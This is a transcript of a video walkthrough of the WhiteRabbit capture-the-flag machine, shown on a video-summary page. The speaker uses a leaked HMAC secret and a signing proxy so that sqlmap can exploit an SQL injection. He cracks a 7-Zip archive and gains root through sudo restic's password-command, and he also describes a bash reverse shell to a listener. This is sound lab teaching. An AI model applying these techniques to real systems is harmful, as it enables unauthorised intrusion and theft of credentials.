HackTheBox - WhiteRabbit

IppSec · Beginner · 🛠️ AI Tools & Apps · 6mo ago

Key Takeaways

The video demonstrates a cybersecurity penetration test on the WhiteRabbit system, utilizing various tools such as nmap, Burp Suite, and Caido to exploit vulnerabilities and gain access to sensitive information. The test involves identifying and exploiting file disclosure vulnerabilities, SQL injection, and insecure use of seeds in password generators.

Full Transcript

What's going on YouTube? This is IppSec. We're doing White Rabbit from Hack The Box, which starts out with finding an Uptime Kuma instance, but we don't have any credentials. However, with some light recon, we discover a public status page that leads to other domain names. There's a wiki that talks about a webhook pipeline to GoPhish, and that signs the body of the request with HMAC to prevent any tampering. However, the signing key is leaked, so we can bypass the signing and find an SQL injection. It's a bit of a pain to do this manually in the Repeater window because you have to keep changing the signature every request, but I try out Caido for this part since the workflow makes it pretty simple to automatically do this. And I mistakenly thought it was free, but I think my account was on some type of trial. Anyways, after we do this, we'll use Python to quickly create a proxy that makes it easy for other tools like sqlmap to exploit this. After all that, we'll exploit a restic backup service and also a custom password generator that is using an insecure seed. So with all that being said, let's just jump in. As always, I'm going to start off with nmap. So -sC for default scripts, -sV to enumerate versions, -vv for double verbose. This gives us things like the TTL. -oA to output all formats, put it in the nmap directory and call it whiterabbit, and then the IP address of 10.10.11.63. This can take some time to run, so I've already run it. Looking at the results, we can see there are three ports open. The first one is SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its TTL is 62, so one less than SSH. So this is probably going to be one hop away. And it's running the Caddy HTTPD server, and it's directing us to whiterabbit.htb. So let's go ahead and add this to our hosts file. So we'll do a sudo vi /etc/hosts. And then we can add, let's do 10.10.11.63 whiterabbit.htb. Save that. And let's see what else we have.
There is another SSH server on port 2222. The TTL is 62, so the same TTL as the Caddy. And then we have an SSH banner, and we can see these are different. This is 3 Ubuntu 139. This is 3 Ubuntu 135. So this one is slightly out of date. The SSH host keys are also different. So we know this is definitely going to be a different SSH server. If I had to guess, this is probably going to be Docker, because most of the time Docker containers tend to be out of date compared to the main OS, just because a lot of sysadmins like doing apt update, and with Docker you have to re-pull it and things like that. So I'm just going to guess that is Docker, and the web server is most likely going to be on the same container, but it doesn't really have to be. So once we get a shell on this, I'm going to assume it's Docker and start enumerating the network. That's just what I'm thinking, right? So let's go ahead and take a look at the web server. So I'm going to go to http://whiterabbit.htb and we get a page that just says penetration testing services. This is a single page website, so if I click any of the links, it just brings me down to where it is. And we have some stuff here. We have it using n8n. Maybe that's pronounced "nate-n"; I forget how to pronounce that exactly. GoPhish. And then they have Uptime Kuma as well. So they're just talking about their services here. We could try seeing if there's a unique 404 page. We're just getting a completely blank response. Let's try a curl on this. That's probably going to be typical of Caddy; I'm guessing it just responds with 404 and no data. We could also look at what Wappalyzer says and see if it identifies anything. So if we go here, look at the extension: Caddy, Bootstrap, jsDelivr. I'm guessing this is a static website. So my first guess is going to be trying to fuzz for virtual hosts. So I'm going to use ffuf for this. We could use gobuster, but I've just started using ffuf more for it.
So we can do http://whiterabbit.htb, and I have to fix that spelling. The header is going to be Host: FUZZ.whiterabbit.htb. Then the wordlist we're going to use is SecLists Discovery/DNS, and I like using subdomains-top1million. Let's do the 5000. So hit enter. And then I'm going to filter size for zero. We could probably filter status code for 302, but I like using size whenever possible. And we get a new domain, which is status. So let's go ahead and add this. So sudo vi /etc/hosts. Then we can add status.whiterabbit. Man, I'm not typing that last T. .htb. Save that. Close. And let's do http://status.whiterabbit.htb. And we get Uptime Kuma. So if we try just logging in with like admin/admin, we get nothing. We could go to the GitHub repo and see what it's coded in. But one thing I always like doing again is looking at what things are built with. And we see this is Vue.js. So like Vue, React's another one: a lot of these big front-end web frameworks, you can get a lot of information from just analyzing the web app itself, because a lot of the processing is done on the client. So I'm going to intercept this and send it to Burp Suite, and we're going to see exactly what happens when we log in. So we click login. Did that not intercept? Let's do a full page refresh, and then let's see, it's trying to go to dashboard. Okay, I'm going to try admin/admin, login. We fail. So if I go to HTTP history, we just see dashboard, and then we switch over to WebSockets. If I look at the WebSocket history, let's go down. Probe, probe, 5. Here's our attempt to log in. And then we get a message back. It says, "ok: false, incorrect username or password." So what I want to do is change this to true. And then we can see if we can just magically log in. Now, if we go to the server and they have everything implemented properly, we won't be able to do anything.
But there's always a chance that there's some functionality that unauthorized users can do, and you just get a better feel of the website itself. So let's turn intercept on, login, and then we're going to forward this login request, and let's see, here is the message. So let's do true here, forward, turn intercept off, and we can see the page, right? If I click on, let's see, settings, then we go to about, something flashes and then it goes away very quickly. If we try to do a lot of things, it'll probably just say access not allowed. But if I turn intercept on, I can click on about and we can get the exact version of Uptime Kuma. So if we wanted to now, we could go to CVE Details. Let's see, probably turn Burp Suite off so it goes a little bit quicker. And then we play around with uptime kuma. Except, Uptime Kuma. We got a few hits. And this is one of the things I don't like about it: you just kind of have to click around. We don't see anything in 2025. We could look at the cross-site scripting in 2023, but I think this version is newer than that. Here's another product here. Looking at this, let's see. We are 1.23. I want to say 16. Let's see. Okay, it's already timed us out. I want to say it was 16. So, nothing here. Version 2.0 does have a vulnerability. So we can look at this. And there is a file disclosure. So maybe we want to look at it more in depth, but it's telling us we need an authenticated user. So chances are this isn't going to work. Maybe it doesn't work because this feature is new in 2.0 and we're in 1.0. Additionally, this could just be requiring authentication. So I'm just going to keep this in mind, but let's go ahead and play around more. And I hate that this always brings us back to the login page after a couple of seconds. So what I'm going to do is tell my Burp Suite to automatically match and replace it. So we have a WebSocket rule.
I'm going to go from server to client, and we want to match "ok": false, and we're going to replace that with "ok": true. So now whenever Burp Suite sees that, it's just going to magically intercept it. So we should be able to play a little bit longer before it times us out. Let's switch back to Burp. Refresh. Do we have intercept on? No, we don't. Okay. Admin. Admin. Magic happens. And now we get here. So we could click around, see what we have. A lot of these things kind of just disappear immediately. Again, there's probably a lot of just access denied type of things. But if I click on status pages, we get an infinite load here. This is probably the same thing I'm talking about, like we just don't have access to do something, so the page is broken. That is annoying. There we go. What request are you making? GET, POST. This is going to be a WebSocket thing, so we probably won't be able to see. If we click on new status page, it tells us the slug is /status, and this is going to be for monitors, right? If we're logged in, chances are we'd have pages here, but since we're not logged in, it doesn't really display any. However, we can try brute forcing a status page. So let's go ahead and try that. So we can go back to ffuf, and we can do status.whiterabbit.htb, and then we're going to do FUZZ here, and again we could use gobuster to do a dirbust, but I already have this command, so might as well just do it this way, right? So let's see, Discovery, we can do Web-Content, raft-small-words.txt, and the URL is actually /status/FUZZ, right, because we want to fuzz any status pages. So do this and there is a page called temp. So let's try accessing this. So we can just go to status.whiterabbit.htb/status/temp and we get a dashboard. Awesome. So we have GoPhish, n8n, the main website, and then Wiki.js. So we have a few hosts here. So I'm just going to copy this and then, you guessed it, we're going to add it to our hosts file.
So sudo vi /etc/hosts, we can add that one. And what is this? We can also add this domain. Okay, save these. And let's go take a look at GoPhish. We have to actually do HTTP. There we go. And it wants us to sign in. I don't think there's a default credential for GoPhish. I think once you install it, it generates a credential for you. Let's check out the wiki to see if there's anything here. So I'm going to copy this and then we'll go to this page as well. And the wiki is loading. Let's see. We have Wiki.js. We have a to-do: add authentication to the wiki because it may have sensitive data. Let's see if we click on browse, does anything happen? Page contents. Oh, here we go. It finally loaded. So we have GoPhish webhooks. So looking here, we can see, can I make this picture bigger? There we go. So this is going to be kind of a big picture of what the webhook's doing, right? So it's going to look at a POST request. It's going to check the GoPhish header. If there's no GoPhish header, it's going to go down here, and I think this is like fail, right? That's going to extract the signature. It's going to calculate an HMAC and then see if that HMAC is valid. If it's not valid, it's going to reject it. If it is valid, it's going to go up here to get the current phishing score. If it errors here, it's going to do some type of debug and stop. And then here, it's going to check if the user exists in the database and then get us some information. So it's kind of hard to understand exactly what's going on, but maybe there's more documentation to clear this up, right? So here we go. We have documentation here. Maybe I should have just read this, but you kind of get the general point. So here's an example HTTP request, and it's going to go to this webhook and then this UUID. Here's the signature. And then we're testing this. So let's go ahead and copy this and let's see if it works.
We probably have to add this host to our hosts file because I'm guessing this is a new host, or maybe that's the GoPhish one. a668. Nope, we don't have that because this is a 28. So we can save this. We don't need ffuf anymore. Let's see. Okay, I'm just going to make a request to this page. We will intercept it in Burp Suite. So intercept on, make a request, send the request to Repeater, and then let's go ahead and disable that for now. Copy this. Put this big thing in the Repeater window. So if I send this, do we get anything? We get "user is not in the database". If we change this request up, we get "provided signature is not valid". And again, if we go back to the workflow, we changed the body of the request, so the GoPhish signature is no longer valid and we get rejected. We don't keep on going, right? So we have to find out exactly how it is calculating this signature. So let's keep reading the wiki, and they have this GoPhish phishing score to database JSON file. So I'm going to go ahead and download this, and let's go ahead and move the GoPhish download here. And if we cat it, let's see, we have a big JSON thing, and the main thing I want to grab, let's see, this all to me is noise. I kind of want to see parameters and name, I think. So let's go ahead and cat this. Let's go jq. We can go in nodes, right? Do I do a .nodes? Okay. And then I want to grab the name and parameters. There we go. This looks better to me. So let's see. So: on no signature, invalid signature, looking here, update phishing score and clicked event, and right here is important to notate, right, this query is going to be parameterized or prepared, I forget the exact wording, but we're putting a variable here and then doing the option query replace. So this is telling whatever SQL engine is used that this is going to be a parameter, and that's going to prevent any type of SQL injection, right? You normally have SQL injection whenever the raw data is passed right in here.
But if you tell it, hey, this is a variable and we're going to replace it, then SQL engines are normally smart enough. Sometimes the case is like with, I think, NodeJS and type juggling or type confusion, but that's a different topic. So let's see, if clicked: this is just updating something, I think. Update phishing score: this looks fine. If submitted data: okay, success. Here is the debug. So I think this is just going to respond with an error message, right? So we respond text, the body is going to be the message, and we'll try to just stringify the error message. Let's see. This is going to be check GoPhish header. And this is just checking if we have the X-Gophish-Signature. This is going to extract it. So we're going in the headers, looking at the GoPhish signature, and then splitting and grabbing it. And right here we have a sensitive data leak. We have the secret potentially used to calculate the signature. So let's go ahead and, we'll call this HMAC secret, I guess. Paste that in just so we have it, and see what else we have. Get current phishing score. I think this is going to be the query we are using, and it is doing a SELECT * FROM victims WHERE email, and it passes this JSON body email in directly. So this is going to be SQL injectable, right? It's not the $1 and then doing a replace. This is just passing in raw data. So what we want to do is see if we can get some type of injection working here. So I'm going to go over to CyberChef because this is going to be, I think, the easiest way for us to validate how the secret is being generated. So let's just do CyberChef, and then I'm going to go over to Google. I think it's just cyberchef.io, right? This is it. This page. Come on. Loading. Awesome. So let's grab this. We'll input this, and then let's see, do we have like a to JSON? Well, let's just try HMACing first. So we can do HMAC, paste it in here. It's probably SHA-256 based upon the length they showed. Yeah.
Oh, and they say SHA-256. So let's go ahead and grab this HMAC secret. Copy this. Paste. And this gets BE21. And we should have a CF45. Now, we're giving it multiple lines of data, right? I bet if we change this, yes, the output does change. So one thing we could try is a JSON minify. And that's just going to make this JSON remove spaces and everything like that. So now if I delete things here, it's going to be the same. And this is probably how backend libraries are working, right? So this is D7, ends with 31A4, and this is CF. So this is not right. I actually expected this signature to match up. Let's see. UTF-8. There we go. So we're on the wrong type of key. We had hex, and this is definitely not hex. So now we have CF. If I take this minify off, you can see it definitely doesn't match. So, always nice to just check before we do any type of coding. So now we have this. We could try putting a single quote in, right? So we do a single quote. This is going to be the output. So let's put a single quote, change the signature, send, and user not in the database. If we go back and look at this, it is using double quotes, right? Not single quotes. So let's go ahead and change this. I wonder, we may have to do a backslash. Let's try a backslash double quote like this. If this doesn't work, then I'm going to get rid of the backslash. Escape characters are always weird. But here we go. Now we have an error message. Now, if we wanted to do this manually a bunch of times, this is a painful process. Going to CyberChef, going here, and editing it, right? I do not like that. I want to say if we had Burp Suite Pro, we could use custom actions. I also tried playing around a lot with these Python scripts and maybe creating a Python extension, but I kept running into problems, and then I was thinking if I ever got this working, I'd always just have to go Google again, right?
If you're curious where this Python script's coming from, it is an extension, Python Scripter. But I had a lot of trouble with this and I never ended up getting it working, but I didn't think it was a good thing just because it wouldn't benefit me in the long run. So this is where I switched over to Caido to see if it did something for free that Burp Suite didn't. And it does. So this is going to be the first video we actually show Caido, right? So we're going to open up Caido. Come on. And I was thinking about using Caido for the whole video, but I ran into troubles doing WebSocket stuff with Caido. So neither tool is perfect, right? We have to create a project first. So I'm just going to create this project. We'll mark it as temporary and call it white rabbit. And I'm also logged into Caido. That's one thing it's also particular about: creating an account and logging in. But let's get back to this. So we go to intercept. Let's go to our browser. I want to do the same thing we did in Burp. Where do we want to go? Probably this URL. Let's go here. Burp, HTTP. There we go. So we go to history. We have all the pages just like we do in Burp. But I'm going to press Ctrl+R to go into the Replay tab. It's the same thing as Repeater. And we have pretty much the same thing. Instead of, I think, Ctrl+Space in Burp, it's Ctrl+Enter to send the request. But we have the request. One thing that's nice is it does track the history. So I can always just go back in history. I wish Burp Suite did that, because you can change the request and easily get back to it. We can rename this. So instead of 1, this is going to be fish request, maybe. Yeah, that seems fine. And then I want to go and grab this. We'll paste this, send, and user not in database. So Caido allows us to do a workflow, like passive, active. I wish I could get this working in the Replay window, but for some reason it just wasn't working.
Like, I tried creating a new workflow, and then in my mind, if I try to create a finding on everything, I should get a finding as soon as it's run. So that's what I was trying to do. Did I have to save that? There we go. There's passive. Let's go ahead and create one here. Create finding on active. And if this works, I'm going to be sad, and we're going to have to try to play with these windows. That's enabled. That's enabled. So if I go to Replay, send it. Then we go to findings, we don't have anything. So I don't think those workflows actually work on this window. And I could be wrong with that, because this is literally the first time running Caido. But if I click run in the workflow, we do have it creating a finding for us. But I think the workflows for that are mainly for if I want to point a program to use the proxy, then it can act on it. But it does have this convert option, which I got to work with this. So if we go to this pane and we make the whole request, we can add a placeholder and we can give it a workflow, right? And I think the intent of this is to just be able to highlight something, give it a workflow to Base64 encode it, URL encode it, things like that. So every time we're editing the request, we don't highlight it and press Ctrl+U to URL encode it. We can just have Caido say, "Hey, do this in the background for us." However, if we create a new workflow, we'll be able to just automatically replace this SHA header, or this SHA checksum, with the value we want. So I'm going to go to convert, new workflow, and let's try this out. So we can add a node, and I'm going to first add one for JavaScript to get the body of the request. I wish there was a node that just had like get body, get header, but I couldn't find it. It's not that hard to create. So let's see. This is going to give us the full request. And now what we want to do is get the header and the body. So we're going to say parsed.split.
And then we just want to do a regular expression for a double line break. And I'm doing it \r?\n because this will match zero or one times. So if it's just two \ns, it'll still match. So that's why I'm doing it that way. So we can do the same thing. And now we should have two variables, the header and the body, actually split. Let's do a max of two. There we go. So now if I return the body, or no, string, we should be able to save, and then we want to put the input here, because this is just going to let us test it. There we go. If I click run: workflow exited successfully. We look at the history. We can go here and see what it returned. So this is the data, and now we just returned the body. So this workflow is working as intended, right? So now what we want to do is go back into the editor, and then we want to add a new node. And I'm going to run the JSON minify. It's nice that they have this option. We can pass it to this. And I'm also going to do a rename here. And I'm going to call this grab body. The alias is just going to be body. JSON minify. That's good. We want to grab the body to start. So now this is going to JSON minify the body. Let's do another node. More JavaScript. We're going to send that over here. And now this one is going to be sign. So we'll say sign HMAC. We'll call this HMAC, I guess. And let's see. So we will need to import crypto. So we can say import crypto from "crypto". And that's going to give us the functionality to do the signing. I'm going to rename this parsed to just be message, because that's going to be what we are signing. And then we want to create the key. So we'll do let key is equal to a string, and we'll go and grab the HMAC secret, because that's going to be what the key is. Awesome. And now all we have to do is sign. So we'll do const hmac is equal to crypto.createHmac, sha256, and the key. Then we want to give it the update, and that's going to be message.
So that's going to be the data we are signing. And then what we want to get out of this is hex. So there we go. Now we can just return hmac, and let's see, that is taking in the JSON minify data and signing it. I think that is good. So I'm going to send this here. We'll save, run. Missing reference in convert end. So we just need to put something here. We'll do the hmac, run, and we get the data back. Awesome. So this has successfully signed it, right? We have this here and the ending is this. Now what we need to do though is have this replace the signature. So let's add another node. We can do a match and replace. And there's going to be a really bad way to do it. We probably should use a regular expression and match a specific header, but this is the quick and dirty way. And sometimes that's all you need to do. So we want to do a match and replace against the start of the data. The search term we want is this, the original HMAC string, and we're going to replace it with a reference to the HMAC data. So now we go to convert end, and then that's going to be the match and replace. So we save, run, and here we go. We have the signature. So now if I do a single quote, hopefully the signature does change. It did. So now let's go back over to the Replay tab. We have highlighted the whole thing. I press Ctrl+A. We go to workflow. We probably should name this better, right? We'll do sign GoPhish HMAC. Yeah, that should be fine. Replay workflow. Boom. From 0 to 397. So we match the whole thing. And now I can press Ctrl+Enter, user not in. Now we can put a, was it backslash double quote, signature not valid. Uh oh. That is not good. I swear this was working. What did we send? So we match this. Let's see. Oh, I did not click add. 0 to 99, add. This was working before I did my video. I wonder if there's some type of limit on how many times we can do this. This is going to be really frustrating. "Unlock the full potential."
Yeah, we must be at the limit of workflows. Let's see if I go back in. Let's see, where is workflow? It's because I did this stuff. Delete. Delete. Sign HMAC. Okay. So what I'm going to do is create a new Caido account and we'll copy the workflow over to it. Is there like an export? View, editor. Import. I see import. Where is export? Fit view. Zoom. I guess there's no way. Download. Awesome. Save that. So this really bothers me. No pre-processor. So yeah, I'm going to just use a different account and maybe it'll let me. Maybe there's only so many times you can use a workflow in a day on Caido free, which would be annoying. Okay, so I've now used a different email to log into Caido. Let's hope this works. So if I go to workflows, magically the workflow was still here. I did not actually expect that. I expected to have to import it, but I guess it's saved in some profile, which kind of scares me because it may know I've just switched emails. If I go over to Replay, we don't have any data here. So let's go back to this, we can copy, paste, and now let's go plus. Please have this unlocked. Workflow, sign, add. So that works now. I'm guessing maybe it's time based, which I really hate, because I showed Caido because it allowed this for free, but maybe it's like the first couple of days you have an email. But yeah, this was definitely behind some type of paywall, I think, last time, which is super annoying. Let's see. We'll call this sign, I guess. So if I send this, let's see, Ctrl+Enter, send. Oh, we have to give it a URL. This. There we go. Does it send now? User not in database. That is what I expected. Let's do backslash double quote. There we go. So now it's just magically updating this. It doesn't show us in the actual pane, but it's letting us change things, which is cool. So if we wanted to, we could now use SQL injection here.
And since we're getting it in an error message, it's probably going to be some type of error-based SQL injection. So let's try OR extractvalue. This is going to be XPath. We'll do a new line. And then I want to say SELECT version, open, close that, close that. And then a comment. Send it. And here we go, we have the version. So now we could just run any SQL query and we'd get the data here. So this is how you do it manually. But let's go ahead and switch this up and do this with a proxy, right? Because I want to run sqlmap to automate this. I don't have any easy way to update the signature. I know sqlmap has an eval thing, but that's really clunky. We could potentially write a tamper script, but again, I feel like it's clunky if we write tamper just to do match and replace things. I like creating a middleware proxy that we just point sqlmap to, and it updates the variable for us. And I like doing it that way because we're writing something that's not for a tool specifically. We could point anything to it, right? We could also just go back to Burp Suite or anything else and set our middleware to be the upstream proxy of Burp Suite, and then it'll just edit the request for us. So this would work in anything, right? And we're going to use Python's mitmproxy for this. So let's see. I'm going to make a directory, proxy. I think I kind of explained that poorly. Like my mind is still blown that I literally ran through this Caido step this morning just to make sure I had it how I wanted to explain it, and it worked just fine. As soon as I started recording the video is when it decided to paywall me or something, which sucks. Let's see, new file. We'll say sign_hmac.py. Yeah, create this file. So let's see, we will import hmac. Let's give it the #!/usr/bin/env python3. Let's see. We don't want that. That's fine. I don't need update. Let's do import hashlib.
And of course, I think Copilot has decided not to work. Let's see. Trust. Sure. I did JSON, so we can use JSON minify, things like that. And we can say from mitmproxy import http. Okay, let's do secret is equal to, and we've got to give it the secret key. So we called that what? HMAC secret. We can copy this. Paste it here. And let's see, we give it a request, and this may be fine. So we're looking at method is POST and the path, let's just say the path should start with, where is it, here: webhook. So this is going to intercept any request the proxy receives that is a POST and has webhook in it. So here we go. We do body = flow.request.get_text(), signature, secret. I wonder if we have to JSON something here, because we're just doing body.encode("utf-8"). I am not sure. Let's do X-Gophish-Signature is equal to this. Let's see. sha256= like that. I think that's all we have to do. Let's put this in a try, except Exception. That should be fine. So if this doesn't work, then we'll know we have to update this, because we probably have to encode this in JSON so it becomes minified. I'm guessing it's not going to work right away, but who knows? Let's see. We have the proxy here. So let's just do a mitmproxy. The script is going to be sign_hmac, the port, let's do 8888, mode regular. Okay. So let's see. How can we easily test this? I guess let's just run a sqlmap, right? So we can do sqlmap -u. We'll give it the URL. So that's going to be this and then this. Okay. Then after URL, we probably need the method to be POST. The data, it's going to be JSON. We can just copy this. I don't like that. Put it on all those lines. See, I'm just going to add a space here to throw things off, to make sure it works easily. Maybe if I had all this in minified form, it would just magically work. But I don't want it to work magically. So I'm going to introduce some chaos by putting a few spaces in this JSON. Okay.
The parameter is going to be email. We have to send the headers of Content-Type, and this is going to be application/json. The database was MySQL, and let's do --batch. Let's see if this works. Oh, we didn't specify the proxy. Let's do --proxy=http://127.0.0.1:8888. So that's going to go through to this and we have the request. If I look here, we should be able to see the headers. So this is the request. I don't know if it's sending the header: User-Agent, Host. I don't see the X-Gophish. Response: no signature found. So we have something wrong in our proxy. So we killed the proxy. Let's go ahead and look at this. And I think I spotted the problem. It's probably not being intercepted because of this. We have request flow path is equal to this. We either want to put the full webhook in, or we could probably just change this to be like starts with. So if we do this now, this should hopefully start being intercepted. So let's go ahead and start the proxy back up. Let's go to sqlmap. Run this, and we start seeing the flows. If we go in here, we can see yes, we do have the signature added, but it is not valid. And that's probably because we didn't do those JSON steps, right? I have added a few spaces in the payload to make sure it induces that little bit of chaos. So let's see. Let's go back to our code. And we have the body here. Let's do data = json.loads(body), and then we can say, I'll call it payload, I guess, and we can say this is equal to json.dumps(data), and the separators should be there, and then we want to encode. There we go. And now we should just be able to do payload. Okay, so this is doing essentially what that JSON minify was, hopefully. So let's go here, run this, go back to Python, look at it, response, and we have an error message. That is exactly what we want to see. So now we have our payload working, right?
So we could have gone to Caido or Burp Suite now and pointed at our proxy that we created, and then we'd have the same functionality we did with that whole workflow. I probably should have just shown this, knowing that it's probably behind a paywall, but live and learn. So now it's going to start brute forcing this, or not brute forcing, but just trying to find the exact type of SQL injection. What did we specify? We're not using --technique, so we didn't tell it to do error-based injection, but that should be fine. I'm going to stop the video, or pause the video, and we'll resume when this is done. Okay. So sqlmap is now finished and we can see it found boolean-based blind, error-based, stacked queries and time-based. So let's go ahead and run this command again. And then I'm going to specify --dbs and that's going to just show me all the databases. So it's going to find information_schema, phishing and temp. So let's specify the phishing table because it's probably going to be GoPhish. And I'm going to do --tables so we can see all the tables in this. And we only have victims. I was kind of expecting to see like users so we could get credentials and crack them. But let's go ahead and specify the victims table. And then we will dump it. So looking at this, we have email, phishing score, and I guess int. But this doesn't seem to be that helpful. It's just saying like test2345@example.com and giving us a score. So let's see. test5@example.com. I wonder if I went here. test5@example.com. Send this. User is not in the database. It should be in the database, right? Maybe I'm not understanding this correctly. Okay, we're not sure what's going on there, but it doesn't have any sensitive information. So, let's go ahead and look at that temp table. So let's specify -D temp --tables and there's a command_log. So let's go ahead and do the same thing. So we'll do -T command_log --dump.
And since there's only one table, we could probably just do -D temp --dump or whatnot. But I'm just in the habit of always specifying exactly what I want because a lot of times when I use sqlmap, it's doing something like boolean-based queries and things that are very slow, and I just want to look at specific data and I don't want it to take forever. So I'm just in the habit of always looking closely at what it's doing. So in this command_log we see useradd, then we have restic, which is a backup agent, not agent but like backup service, and it inits the repo, and we have another host here. So I'm going to go ahead and add this to my hosts file, so sudo vi /etc/hosts, and we can add that. And then we have this echo into the restic password, they delete the history and whatnot. In here they're going into their neo, /opt/neo-password-generator, neo password generator, and setting a password. But this looks like it is going to be the restic password, right? And we can kind of test this, or not kind of test it, I mean just test it. I've installed restic already because we've done this before. Again, I think that machine was Artificial. If you go to ippsec.rocks, hopefully I've updated it. Let's see. ippsec.rocks. Let's turn intercept off, advanced, accept. And then let's see, what was this, restic. There we go. We have Registry and Artificial. So you can look at these videos if you want to know more about restic. But here we're just going to use the CLI that I've installed. And I just did a sudo apt install restic is how I installed it. But let's see. We can say RESTIC_PASSWORD is equal to this. And then the URL we want to put is here. So let's do restic at this. Do we have like a check? I think everything's fine. I think it actually looked, let's do a snapshots, and this should show us what backups there are installed. And we have one path, /dev/shm. So, it looks like this has been backed up. So, let's go back here and let's say restore the ID.
And the target is where we want to restore it to. I'm just going to put it in the restic directory. There we go. If we cd restic, we have dev/shm/bob/ssh, and then we have a 7-Zip file. So we do 7z l bob.7z. We have his public key and config. If we try to extract it, it wants a password. So let's run 7z2john on the zip file. And this gets us the hash. And we can send this over to hashcat. So, let's go ahead and copy this hash over to the Kraken, which is another box on my network I do my cracking on. You can do it on anything. I just would recommend not doing it within a VM because it'll go extremely slow. But let's do vi hashes, and this is whiterabbit dot, what is the thing we call it? I guess 7zip. Put this in, and then let's do ./hashcat, the word list, or the hashes, and now the word list. So, /opt/wordlist/rockyou.txt, and let's see if it automatically detects this hash. If it does, then we're good. If not, then we just specify the mode. Let's see. Nothing found at all. I wonder if we have to add --username. And I'm thinking that because the hash had the file name, colon, then the hash. So, by adding --username, I think that may help it find it. It looks like it does. It is at least cracking. Now let's look at what mode it is on. 11600, which is 7-Zip. So that looks good. And it is going to crack. Let's see how long does it say. rockyou, time estimate up to 31 minutes. It probably won't take that long. It should take probably five, like under five minutes I think, as is most cracking on Hack The Box. So I'm just going to pause the video and let this run. And there we go. It took about one minute to run. And if I just do --show, we should be able to see what the password was. It looks like it is pinklady1. So let's go ahead and get out of my box and we can try to extract this. So 7z x bob.7z. Paste in the password. Was that my... Looks like it was data error in encrypted file. Doesn't look like that worked.
Let's see. It's definitely saying pinklady1. Copy. Paste. Let's go back into the Kraken and let's try editing a word list to remove pinklady1 and then try cracking it again, because I definitely feel like I've had this happen before, where hashcat, like in the 7-Zip mode specifically, has some type of hash collision where it's not perfect and it gives you a bad password. So, shoot, let's just go vi rockyou.txt. I just realized I did that in a backwards order because I was talking. So I'm just going to add rockyou, the pinklady1, back in it. And rockyou2 does not have pinklady1, right? rockyou2. Let's do pinklady1$. There we go. That should be end of line, right? So that should be it. So let's go back into root hashcat, and then we can say ./hashcat --username hashes/whiterabbit /opt/wordlist/rockyou2.txt. And we also have to remove the hashcat.potfile because this is going to be where it stores all the successful cracks. And if we didn't remove it, it wouldn't attempt to crack it; it would just automatically remove it because it thinks it knows the password. So hopefully this will help us. Let's see. There we go. It took a minute to crack last time. It's probably going to take a couple minutes now if it's going to work. So I'm going to pause the video and we will resume when this finishes. And around a minute yet again. That is surprising. It has cracked again. I'm going to be so upset when this says pinklady1. No, we get a keyboard walk. So we get a different hash. So let's go ahead and copy this. And then we're going to try 7z extract on this file again. And this time it successfully extracted. So if we cat the config, we can see this is going to be port 2222. Username is bob. We got the public key and the private key. So if I cat pub.pub, we can see it's actually root@lucy, which is a bit odd, and I guess they just renamed the file. We can also do it from the private key.
A lot of times people get like a private key, they don't know what it goes to, and they just assume they can't find out. But the very end, at the bottom of a private key, is going to be the actual public key. So if we just do grep -v, and I'm going to do this to get rid of the line breaks, or not the line breaks, the dashes. So now if I do this, we just have base64. We can do base64 -d, pipe it over to strings. And we also have the public key as well that says root@lucy. Doesn't really mean anything. It doesn't really help you with this box. It's just interesting to me that the keys were generated for root@lucy and then renamed to bob. But let's do a chmod 600 on bob so we can use this key. And then it is going to whiterabbit on port 2222. So let's do ssh -i bob whiterabbit.htb -p 2222. Yes, accept this. We need to specify bob@ this. And there we go. We get logged in. And this is going to be a Docker container most likely, just based upon this hostname. We can do ls -la on /. There is a .dockerenv. If I do a sudo -l, we can see bob can run restic as root, and I think it was the Artificial machine where we showed there is a command injection vulnerability in this. I wonder if it's on GTFOBins. Let's do GTFOBins. We can see. I don't think it would be. Oh, maybe it is. Sudo. Let's see, right here, they're not actually using the one we show. They're going to create a backup and then restore the backup over top of something. So essentially you can like create a cron job, back it up, restore that cron to like /var/spool/cron/root, and now that cron job will run and you get a shell, or you can just overwrite the passwd, shadow, whatever file. But restic also supports an option called --password-command. Let's see, let's do sudo restic -h, password. There we go. So this is a shell command to obtain the repository password. So we can use this in order to get a shell, right? So we do sudo restic. Let's do --password-command touch /tmp/ipsec and then some command.
I think I have to check it'll work. Do ls -la on /tmp. We have ipsec owned by root. So what we can do is just, I'm going to copy /bin/bash over top of /tmp/ipsec, and then let's do a chmod 4755 on /tmp/ipsec, and this is going to give us a bash that has the setuid bit so we can escalate to root, right? So /tmp/ipsec -p. Permission denied. What? Root. That's weird, that didn't copy it over. Let's see. /bin/bash over. Let's do shell. No, follow directory. Am I like missing what cp is? I wonder if it doesn't like the && and /tmp. Okay, we got shell there. I don't think it likes chaining the commands. So I also do chmod 4755. And if we look at this now, it is a setuid file. So we can do /tmp/shell -p. And now we are going to be root. And you may be asking like, why not just make /bin/bash setuid, like do the chmod command on /bin/bash? And the main reason is any script that is just calling or exec-ing shell may just magically become root, and that can break things on a system. Of course, it's also a security vulnerability. Doing it in /tmp is also a security vulnerability, but it's much cleaner to just remove it afterwards. But whenever doing the shell, I always like just copying /bin/bash and then moving it over. We could probably also do a reverse shell command. Maybe not. Maybe it's going to fail. Let's see. Where was my command? Let's try this real quick. I'm going to do a bash -c, -i, /dev/tcp/[my IP]/9001, 0>&1, like that. Close out all the quotes and let's go ahead and listen on 9001. So, we could also do a reverse shell command like that. So, there's a lot of things we could do; that reverse shell command is probably going to be the most secure way to do it. But this gives us a nice shell that is like fully compliant. We can do Vim, whatever we want. So, I like this. I was hoping if I did bash it would return my shell to a normal way, but it doesn't. Let's go in /root and let's see. There is a public key called morpheus.
